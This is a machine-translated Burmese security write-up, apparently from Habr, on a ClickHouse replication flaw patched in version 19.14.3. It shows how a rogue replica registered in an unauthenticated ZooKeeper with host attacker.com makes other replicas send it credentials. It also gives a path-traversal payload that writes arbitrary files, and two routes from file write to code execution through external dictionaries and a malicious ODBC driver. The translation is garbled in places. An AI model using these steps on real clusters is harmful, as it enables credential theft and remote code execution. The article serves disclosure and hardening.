တိရစ္ဆာန်ရုံ လှောင်အိမ်တွေကို ဘာကြောင့် ပိတ်ဖို့ လိုအပ်တာလဲ။

ဤဆောင်းပါးသည် ClickHouse ကူးယူမှုပရိုတိုကောရှိ အလွန်တိကျသော အားနည်းချက်တစ်ခုအကြောင်း ပြောပြမည်ဖြစ်ပြီး၊ တိုက်ခိုက်မှုမျက်နှာပြင်ကို မည်ကဲ့သို့ချဲ့ထွင်နိုင်သည်ကိုလည်း ပြသမည်ဖြစ်သည်။

ClickHouse သည် ပုံတူတစ်ခုထက်ပိုသော ဒေတာအများအပြားကို သိမ်းဆည်းရန်အတွက် ဒေတာဘေ့စ်တစ်ခုဖြစ်သည်။ ClickHouse တွင် အစုလိုက်အပြုံလိုက်နှင့် ပုံတူပွားခြင်းကို ထိပ်ဆုံးတွင် တည်ဆောက်ထားသည်။ Apache ZooKeeper (ZK) နှင့် ရေးသားပိုင်ခွင့် လိုအပ်သည်။

မူရင်း ZK တပ်ဆင်မှုသည် စစ်မှန်ကြောင်းအထောက်အထားပြရန် မလိုအပ်ပါ၊ ထို့ကြောင့် Kafka၊ Hadoop၊ ClickHouse ကို စီစဉ်သတ်မှတ်ရန် အသုံးပြုသည့် ထောင်ပေါင်းများစွာသော ZK ဆာဗာများကို အများသူငှာ ရရှိနိုင်ပါသည်။

သင်၏ တိုက်ခိုက်မှု မျက်နှာပြင်ကို လျှော့ချရန် ZooKeeper ကို ထည့်သွင်းသည့်အခါ စစ်မှန်ကြောင်းနှင့် ခွင့်ပြုချက်ကို အမြဲတမ်း သတ်မှတ်ပေးသင့်သည်။

0day ကိုအခြေခံထားသော Java deserializations အချို့ရှိပါသည်၊ သို့သော် တိုက်ခိုက်သူသည် ClickHouse ပုံတူကူးယူမှုအတွက်သုံးသော ZooKeeper သို့ ဖတ်ရှုနိုင်၊ စာရေးနိုင်သည်ဟု စိတ်ကူးကြည့်ပါ။

အစုအဝေးမုဒ်တွင် ပြင်ဆင်သတ်မှတ်သောအခါ၊ ClickHouse သည် ဖြန့်ဝေမေးမြန်းချက်များကို ပံ့ပိုးပေးသည်။ DDLZK ကိုဖြတ်သွားသည် - ၎င်းတို့အတွက် node များကိုစာရွက်တွင်ဖန်တီးထားသည်။ /clickhouse/task_queue/ddl.

ဥပမာအားဖြင့်၊ သင်သည် node တစ်ခုကိုဖန်တီးသည်။ /clickhouse/task_queue/ddl/query-0001 အကြောင်းအရာနှင့်အတူ

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

ထို့နောက်၊ စမ်းသပ်ဇယားကို အစုလိုက်ဆာဗာများ host1 နှင့် host2 တွင် ဖျက်လိုက်ပါမည်။ DDL သည် CREATE/ALTER/DROP queries များကို လုပ်ဆောင်ရန်လည်း ပံ့ပိုးပေးပါသည်။

အသံက ကြောက်စရာလား။ သို့သော် တိုက်ခိုက်သူသည် ဆာဗာလိပ်စာများကို မည်သည့်နေရာတွင် ရနိုင်သနည်း။

ClickHouse ပုံတူပွား ဇယားတစ်ခုချင်းစီ၏အဆင့်တွင်အလုပ်လုပ်သည်၊ ထို့ကြောင့်ဇယားတစ်ခုကို ZK တွင်ဖန်တီးသောအခါ၊ metadata ကိုပုံတူများနှင့်လဲလှယ်ရန်တာဝန်ရှိမည့်ဆာဗာတစ်ခုအားသတ်မှတ်ထားသည်။ ဥပမာအားဖြင့်၊ တောင်းဆိုမှုတစ်ခုကိုလုပ်ဆောင်သောအခါ (ZK ကို configure လုပ်ထားရမည်၊ chXX - ပုံတူအမည်၊ foobar - ဇယားအမည်):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

node များကိုဖန်တီးလိမ့်မည်။ ကော်လံ и metadata ကို.

အကြောင်းအရာ /clickhouse/tables/01/foobar/replicas/chXX/hosts:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

ဤအစုအဝေးမှဒေတာကို ပေါင်းစည်းရန် ဖြစ်နိုင်ပါသလား။ အကယ်လို့ ကူးယူမှု ပို့တ် (TCP/9009) ဆာဗာပေါ်တွင် chXX-address Firewall ကို ပိတ်မည်မဟုတ်သလို ထပ်တူကူးယူခြင်းအတွက် စစ်မှန်ကြောင်းကို ပြင်ဆင်သတ်မှတ်မည်မဟုတ်ပါ။ စစ်မှန်ကြောင်းအထောက်အထားကို ဘယ်လိုကျော်ဖြတ်မလဲ။

တိုက်ခိုက်သူသည် အကြောင်းအရာများမှ အကြောင်းအရာများကို ကူးယူရုံဖြင့် ZK တွင် ပုံတူအသစ်တစ်ခုကို ဖန်တီးနိုင်သည်။ /clickhouse/tables/01-01/foobar/replicas/chXX နှင့် အဓိပ္ပါယ်ကို ပြောင်းလဲခြင်း။ host.

အကြောင်းအရာ /clickhouse/tables/01–01/foobar/replicas/attacker/host:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

ထို့နောက် တိုက်ခိုက်သူ၏ဆာဗာတွင် ဒေတာဘလောက်အသစ်တစ်ခု ရှိနေကြောင်း အခြားပုံတူများကို သင်ပြောပြရန်လိုအပ်သည် - node တစ်ခုကို ZK တွင် ဖန်တီးထားသည်။ /clickhouse/tables/01-01/foobar/log/log-00000000XX (ဖြစ်ရပ်မှတ်တမ်းရှိ နောက်ဆုံးတစ်ခုထက် ကြီးသင့်သော XX monotonically ကြီးထွားနေသောကောင်တာ XX)

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

ဘယ်မှာ အရင်းအမြစ်_ပုံတူ - ယခင်အဆင့်တွင် ဖန်တီးထားသည့် တိုက်ခိုက်သူ၏ ပုံတူအမည်၊ block_id - ဒေတာပိတ်ဆို့သတ်မှတ်သူ၊ ရယူ - "get block" အမိန့် (နှင့် ဤသည်မှာ အခြားလုပ်ဆောင်မှုများအတွက် အမိန့်များဖြစ်သည်။).

ထို့နောက်၊ ပုံစံတူတစ်ခုစီသည် မှတ်တမ်းရှိ ဖြစ်ရပ်အသစ်တစ်ခုကို ဖတ်ပြပြီး ဒေတာဘလောက်တစ်ခုကို လက်ခံရရှိရန် တိုက်ခိုက်သူထိန်းချုပ်ထားသော ဆာဗာသို့သွားသည် (ပုံတူပရိုတိုကောသည် binary ဖြစ်ပြီး HTTP ၏ထိပ်တွင် လုပ်ဆောင်နေသည်)။ ဆာဗာ attacker.com တောင်းဆိုချက်များကိုလက်ခံရရှိလိမ့်မည်-

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

XXX သည် ကူးယူခြင်းအတွက် စစ်မှန်ကြောင်းသက်သေပြခြင်းဒေတာဖြစ်သည်။ အချို့ကိစ္စများတွင်၊ ၎င်းသည် ပင်မ ClickHouse ပရိုတိုကောနှင့် HTTP ပရိုတိုကောမှတစ်ဆင့် ဒေတာဘေ့စ်သို့ ဝင်ရောက်နိုင်သည့် အကောင့်တစ်ခု ဖြစ်နိုင်သည်။ သင်တွေ့မြင်ရသည့်အတိုင်း၊ ZooKeeper ကို ပုံတူကူးယူရန်အတွက် အသုံးပြုသော တိုက်ခိုက်မှုမျက်နှာပြင်သည် အထောက်အထားမခိုင်လုံဘဲ ကျန်ရစ်နေသောကြောင့် တိုက်ခိုက်မှုမျက်နှာပြင်သည် အလွန်ကြီးမားလာသည်။

ပုံတူတစ်ခုမှဒေတာဘလောက်တစ်ခုကိုရယူခြင်း၏လုပ်ဆောင်ချက်ကိုကြည့်ကြပါစို့၊ ပုံတူများအားလုံးသည် သင့်လျော်သောထိန်းချုပ်မှုအောက်တွင်ရှိပြီး ၎င်းတို့ကြားတွင်ယုံကြည်မှုရှိကြောင်းယုံကြည်မှုအပြည့်ဖြင့်ရေးသားထားသည်။

ကူးယူမှုလုပ်ဆောင်ခြင်းကုဒ်

လုပ်ဆောင်ချက်သည် ဖိုင်များစာရင်းကို ဖတ်ပြီးနောက် ၎င်းတို့၏ အမည်များ၊ အရွယ်အစား၊ အကြောင်းအရာများကို ဖတ်ရှုပြီးနောက် ၎င်းတို့အား ဖိုင်စနစ်သို့ ရေးပေးသည်။ ဖိုင်စနစ်တွင် ဒေတာကို မည်ကဲ့သို့ သိမ်းဆည်းထားကြောင်း သီးခြားဖော်ပြရကျိုးနပ်သည်။

ထဲတွင် လမ်းကြောင်းခွဲများစွာရှိသည်။ /var/lib/clickhouse (ဖွဲ့စည်းပုံဖိုင်မှ မူရင်းသိုလှောင်မှုလမ်းညွှန်)-

အလံ - မှတ်တမ်းတင်ရန်လမ်းညွှန် အလံများဒေတာဆုံးရှုံးပြီးနောက် ပြန်လည်ရယူရာတွင် အသုံးပြုသည်။
tmp - ယာယီဖိုင်များသိမ်းဆည်းခြင်းအတွက်လမ်းညွှန်။
အသုံးပြုသူ_ဖိုင်များ - တောင်းဆိုချက်များထဲတွင် ဖိုင်များပါသော လုပ်ဆောင်ချက်များကို ဤလမ်းညွှန်တွင် ကန့်သတ်ထားပါသည် (ပြင်ပဖိုင်နှင့် အခြားအရာများ)။
metadata ကို - ဇယားဖော်ပြချက်များပါရှိသော sql ဖိုင်များ၊
preprocessed_configs - စီမံဆောင်ရွက်ထားသော ဆင်းသက်လာသော configuration ဖိုင်များမှ /etc/clickhouse-server;
ဒေတာ - ဒေတာကိုယ်နှိုက်နှင့် အမှန်တကယ်ရှိသော လမ်းညွှန်၊ ဤအခြေအနေတွင် ဒေတာဘေ့စ်တစ်ခုစီအတွက် သီးခြားလမ်းကြောင်းခွဲတစ်ခုကို ဤနေရာတွင် ရိုးရိုးရှင်းရှင်း ဖန်တီးထားသည် (ဥပမာ၊ /var/lib/clickhouse/data/default).

ဇယားတစ်ခုစီအတွက်၊ ဒေတာဘေ့စ်လမ်းညွှန်တွင် အခွဲတစ်ခုကို ဖန်တီးထားသည်။ ကော်လံတစ်ခုစီသည် အပေါ်မူတည်၍ သီးခြားဖိုင်တစ်ခုဖြစ်သည်။ အင်ဂျင်ပုံစံ. ဥပမာ စားပွဲတစ်ခုအတွက် foobarတိုက်ခိုက်သူမှ ဖန်တီးထားသော အောက်ပါဖိုင်များကို ဖန်တီးပေးမည်-

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

ပုံတူသည် ဒေတာဘလောက်တစ်ခုကို လုပ်ဆောင်သောအခါတွင် တူညီသောအမည်များဖြင့် ဖိုင်များကို လက်ခံရရှိရန် မျှော်လင့်ထားပြီး ၎င်းတို့ကို မည်သည့်နည်းဖြင့်မျှ တရားဝင်အောင်မလုပ်ပါ။

အာရုံစူးစိုက်သောစာဖတ်သူသည် လုပ်ဆောင်ချက်တစ်ခုတွင် file_name ၏ မလုံခြုံသောပေါင်းစပ်မှုအကြောင်း ကြားဖူးပြီးသားဖြစ်ကောင်းဖြစ်နိုင်သည်။ WriteBufferFromFile. ဟုတ်ပါသည်၊ ၎င်းသည် တိုက်ခိုက်သူတစ်ဦးအား FS ပေါ်ရှိ မည်သည့်ဖိုင်တွင်မဆို မတရားသောအကြောင်းအရာများရေးသားရန် ခွင့်ပြုပေးပါသည်။ clickhouse. ထိုသို့လုပ်ဆောင်ရန်၊ တိုက်ခိုက်သူမှ ထိန်းချုပ်ထားသော ပုံတူသည် တောင်းဆိုချက်အတွက် အောက်ပါတုံ့ပြန်မှုကို ပြန်ပေးရမည် (နားလည်ရလွယ်ကူစေရန် လိုင်းခွဲမှုများကို ပေါင်းထည့်ထားသည်-

x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeper

ပေါင်းစပ်ပြီးနောက် ../../../../../../../../../tmp/pwned ဖိုင်ကိုရေးသားလိမ့်မည်။ /tmp/pwned အကြောင်းအရာနှင့်အတူ hellofromzookeeper.

ဖိုင်ရေးသားခြင်းစွမ်းရည်ကို အဝေးကုဒ်လုပ်ဆောင်မှု (RCE) အဖြစ်သို့ ပြောင်းလဲရန် ရွေးချယ်စရာများစွာရှိသည်။

RCE တွင် ပြင်ပအဘိဓာန်များ

ဗားရှင်းအဟောင်းများတွင် ClickHouse ဆက်တင်များပါရှိသော လမ်းညွှန်ကို အသုံးပြုသူအခွင့်အရေးဖြင့် သိမ်းဆည်းထားသည်။ clickhouse ပုံသေ။ ဆက်တင်ဖိုင်များသည် ဝန်ဆောင်မှုစတင်ချိန်တွင် ဖတ်ပြပြီး ကက်ရှ်လုပ်ထားသည့် XML ဖိုင်များဖြစ်သည်။ /var/lib/clickhouse/preprocessed_configs. အပြောင်းအလဲများ ဖြစ်ပေါ်လာသောအခါ ၎င်းတို့ကို ပြန်လည်ဖတ်ရှုသည်။ ဝင်ရောက်ခွင့်ရှိလျှင် /etc/clickhouse-server တိုက်ခိုက်သူသည် မိမိကိုယ်တိုင် ဖန်တီးနိုင်သည်။ ပြင်ပအဘိဓာန် executable type လုပ်ပြီး arbitrary code ကို execute လုပ်ပါ။ ClickHouse ၏ လက်ရှိဗားရှင်းများသည် ပုံမှန်အားဖြင့် ရပိုင်ခွင့်များကို မပေးဆောင်သော်လည်း ဆာဗာကို ဖြည်းဖြည်းချင်း အပ်ဒိတ်လုပ်ပါက၊ ထိုအခွင့်အရေးများ ကျန်ရှိနေနိုင်သည်။ အကယ်၍ သင်သည် ClickHouse အစုအဝေးကို ပံ့ပိုးနေပါက၊ ဆက်တင်လမ်းညွှန်၏ လုပ်ပိုင်ခွင့်များကို စစ်ဆေးပါ၊ ၎င်းသည် အသုံးပြုသူနှင့် သက်ဆိုင်ရပါမည်။ root.

ODBC မှ RCE

ပက်ကေ့ဂျ်တစ်ခုကို ထည့်သွင်းသောအခါ၊ အသုံးပြုသူတစ်ဦးကို ဖန်တီးထားသည်။ clickhouseသို့သော် ၎င်း၏ပင်မလမ်းညွှန်ကို ဖန်တီးမထားပါ။ /nonexistent. သို့ရာတွင်၊ ပြင်ပအဘိဓာန်များကို အသုံးပြုသည့်အခါ သို့မဟုတ် အခြားအကြောင်းများကြောင့် စီမံခန့်ခွဲသူများသည် လမ်းညွှန်တစ်ခုကို ဖန်တီးသည်။ /nonexistent သုံးစွဲသူကို ပေးပါ။ clickhouse စာရေးရန် ဝင်ရောက်ခွင့် (SSZB! အနီးစပ်ဆုံး ဘာသာပြန်သူ).

ClickHouse ပံ့ပိုးသည်။ ODBC အခြားဒေတာဘေ့စ်များနှင့်ချိတ်ဆက်နိုင်သည်။ ODBC တွင်၊ သင်သည် ဒေတာဘေ့စ်ဒရိုင်ဘာ ဒရိုက်ဘာ (.so) သို့ လမ်းကြောင်းကို သတ်မှတ်နိုင်သည်။ ClickHouse ၏ ဗားရှင်းဟောင်းများက သင့်အား တောင်းဆိုချက်ကို ကိုင်တွယ်သည့်စနစ်တွင် တိုက်ရိုက်လုပ်ဆောင်ရန် ခွင့်ပြုခဲ့သော်လည်း ယခုအခါ ချိတ်ဆက်မှုစာကြောင်း၏ ပိုမိုတင်းကျပ်သော စစ်ဆေးမှုကို ပေါင်းထည့်လိုက်ပြီဖြစ်သည်။ odbc-bridgeထို့ကြောင့် တောင်းဆိုချက်မှ ယာဉ်မောင်းလမ်းကြောင်းကို သတ်မှတ်ရန် မဖြစ်နိုင်တော့ပါ။ သို့သော် အထက်ဖော်ပြပါ အားနည်းချက်ကို အသုံးပြု၍ တိုက်ခိုက်သူသည် home directory သို့ စာရေးနိုင်ပါသလား။

ဖိုင်တစ်ခုဖန်တီးကြည့်ရအောင် ~/.odbc.ini ဤကဲ့သို့သော အကြောင်းအရာဖြင့်

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

ထို့နောက် startup တွင် SELECT * FROM odbc('DSN=lalala', 'test', 'test'); စာကြည့်တိုက်ကို တင်ပါမည်။ test.so နှင့် RCE ကိုလက်ခံရရှိခဲ့သည် (ကျေးဇူးတင်ပါတယ် buglloc ထိပ်ဖျားအတွက်)။

ဤနှင့် အခြားသော အားနည်းချက်များကို ClickHouse ဗားရှင်း 19.14.3 တွင် ပြင်ဆင်ထားပါသည်။ သင်၏ ClickHouse နှင့် ZooKeepers တို့ကို ဂရုစိုက်ပါ။

source: www.habr.com